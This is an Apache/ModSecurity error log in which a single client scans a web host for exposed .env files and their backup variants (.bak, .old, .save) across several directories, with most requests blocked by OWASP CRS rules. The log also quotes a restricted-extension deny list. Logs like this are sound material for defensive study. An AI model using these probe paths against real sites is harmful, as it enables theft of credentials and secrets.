[Sun Nov 16 06:05:29.140379 2025] [:error] [pid 103446] [client 13.62.46.112:37932] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env.old"] [unique_id "aRlbmU-c4YqyOTFJOSeIXgAAAAk"]
[Sun Nov 16 06:05:29.195674 2025] [:error] [pid 105715] [client 13.62.46.112:37938] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env.save"] [unique_id "aRlbmTHqqjYXoy22w5Lv9QAAAAE"]
[Sun Nov 16 06:05:29.195879 2025] [:error] [pid 105715] [client 13.62.46.112:37938] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env.save"] [unique_id "aRlbmTHqqjYXoy22w5Lv9QAAAAE"]
[Sun Nov 16 06:05:29.196051 2025] [:error] [pid 105715] [client 13.62.46.112:37938] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env.save"] [unique_id "aRlbmTHqqjYXoy22w5Lv9QAAAAE"]
[Sun Nov 16 06:05:29.223341 2025] [:error] [pid 105754] [client 13.62.46.112:37946] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env.bak"] [unique_id "aRlbmX3mxOhUaPa_1PS3OAAAAAw"]
[Sun Nov 16 06:05:29.223486 2025] [:error] [pid 105754] [client 13.62.46.112:37946] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env.bak"] [unique_id "aRlbmX3mxOhUaPa_1PS3OAAAAAw"]
[Sun Nov 16 06:05:29.223667 2025] [:error] [pid 105754] [client 13.62.46.112:37946] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env.bak"] [unique_id "aRlbmX3mxOhUaPa_1PS3OAAAAAw"]
[Sun Nov 16 06:05:29.223814 2025] [:error] [pid 105754] [client 13.62.46.112:37946] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env.bak"] [unique_id "aRlbmX3mxOhUaPa_1PS3OAAAAAw"]
[Sun Nov 16 06:05:39.221637 2025] [:error] [pid 103398] [client 13.62.46.112:46678] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env"] [unique_id "aRlbo7czEoTwe_Jf335FYQAAAAA"]
[Sun Nov 16 06:05:39.221874 2025] [:error] [pid 103398] [client 13.62.46.112:46678] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env"] [unique_id "aRlbo7czEoTwe_Jf335FYQAAAAA"]
[Sun Nov 16 06:05:39.222078 2025] [:error] [pid 103398] [client 13.62.46.112:46678] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env"] [unique_id "aRlbo7czEoTwe_Jf335FYQAAAAA"]
[Sun Nov 16 06:05:39.240905 2025] [:error] [pid 105761] [client 13.62.46.112:46686] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env.bak"] [unique_id "aRlboxajcO0QlxhJbyzqXQAAAAo"]
[Sun Nov 16 06:05:39.241073 2025] [:error] [pid 105761] [client 13.62.46.112:46686] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env.bak"] [unique_id "aRlboxajcO0QlxhJbyzqXQAAAAo"]
[Sun Nov 16 06:05:39.241274 2025] [:error] [pid 105761] [client 13.62.46.112:46686] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env.bak"] [unique_id "aRlboxajcO0QlxhJbyzqXQAAAAo"]
[Sun Nov 16 06:05:39.241477 2025] [:error] [pid 105761] [client 13.62.46.112:46686] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env.bak"] [unique_id "aRlboxajcO0QlxhJbyzqXQAAAAo"]
[Sun Nov 16 06:05:39.268366 2025] [:error] [pid 105706] [client 13.62.46.112:46700] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env.save"] [unique_id "aRlbo_gkUVuXhjEnxphnTwAAAAQ"]
[Sun Nov 16 06:05:39.268574 2025] [:error] [pid 105706] [client 13.62.46.112:46700] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env.save"] [unique_id "aRlbo_gkUVuXhjEnxphnTwAAAAQ"]
[Sun Nov 16 06:05:39.268735 2025] [:error] [pid 105706] [client 13.62.46.112:46700] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env.save"] [unique_id "aRlbo_gkUVuXhjEnxphnTwAAAAQ"]
[Sun Nov 16 06:05:39.288130 2025] [:error] [pid 105733] [client 13.62.46.112:46726] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env.old"] [unique_id "aRlbowm3iQ6of_5tM-vZGQAAAAY"]
[Sun Nov 16 06:05:39.288293 2025] [:error] [pid 105733] [client 13.62.46.112:46726] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env.old"] [unique_id "aRlbowm3iQ6of_5tM-vZGQAAAAY"]
[Sun Nov 16 06:05:39.288496 2025] [:error] [pid 105733] [client 13.62.46.112:46726] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env.old"] [unique_id "aRlbowm3iQ6of_5tM-vZGQAAAAY"]
[Sun Nov 16 06:05:39.288661 2025] [:error] [pid 105733] [client 13.62.46.112:46726] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env.old"] [unique_id "aRlbowm3iQ6of_5tM-vZGQAAAAY"]
[Sun Nov 16 06:05:39.295192 2025] [:error] [pid 106191] [client 13.62.46.112:46716] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env"] [unique_id "aRlbo59TX0jrupNVR0KhQgAAAAI"]
[Sun Nov 16 06:05:39.295362 2025] [:error] [pid 106191] [client 13.62.46.112:46716] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env"] [unique_id "aRlbo59TX0jrupNVR0KhQgAAAAI"]
[Sun Nov 16 06:05:39.295503 2025] [:error] [pid 106191] [client 13.62.46.112:46716] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env"] [unique_id "aRlbo59TX0jrupNVR0KhQgAAAAI"]
[Sun Nov 16 06:05:39.302770 2025] [:error] [pid 105760] [client 13.62.46.112:46742] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env.save"] [unique_id "aRlboyX-V6YaRQK52Hc2BQAAAAU"]
[Sun Nov 16 06:05:39.302964 2025] [:error] [pid 105760] [client 13.62.46.112:46742] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env.save"] [unique_id "aRlboyX-V6YaRQK52Hc2BQAAAAU"]
[Sun Nov 16 06:05:39.303137 2025] [:error] [pid 105760] [client 13.62.46.112:46742] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env.save"] [unique_id "aRlboyX-V6YaRQK52Hc2BQAAAAU"]
[Sun Nov 16 06:05:51.172989 2025] [authz_core:error] [pid 106193] [client 13.62.46.112:48712] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env.old
[Sun Nov 16 06:05:51.183950 2025] [:error] [pid 103446] [client 13.62.46.112:48726] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env.old"] [unique_id "aRlbr0-c4YqyOTFJOSeIXwAAAAk"]
[Sun Nov 16 06:05:51.184101 2025] [:error] [pid 103446] [client 13.62.46.112:48726] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env.old"] [unique_id "aRlbr0-c4YqyOTFJOSeIXwAAAAk"]
[Sun Nov 16 06:05:51.184292 2025] [:error] [pid 103446] [client 13.62.46.112:48726] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env.old"] [unique_id "aRlbr0-c4YqyOTFJOSeIXwAAAAk"]
[Sun Nov 16 06:05:51.184444 2025] [:error] [pid 103446] [client 13.62.46.112:48726] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env.old"] [unique_id "aRlbr0-c4YqyOTFJOSeIXwAAAAk"]
[Sun Nov 16 06:05:51.213088 2025] [:error] [pid 105715] [client 13.62.46.112:48746] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env.save"] [unique_id "aRlbrzHqqjYXoy22w5Lv9gAAAAE"]
[Sun Nov 16 06:05:51.213276 2025] [:error] [pid 105715] [client 13.62.46.112:48746] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env.save"] [unique_id "aRlbrzHqqjYXoy22w5Lv9gAAAAE"]
[Sun Nov 16 06:05:51.213437 2025] [:error] [pid 105715] [client 13.62.46.112:48746] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env.save"] [unique_id "aRlbrzHqqjYXoy22w5Lv9gAAAAE"]
[Sun Nov 16 06:05:51.236171 2025] [:error] [pid 105754] [client 13.62.46.112:48742] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env.bak"] [unique_id "aRlbr33mxOhUaPa_1PS3OQAAAAw"]
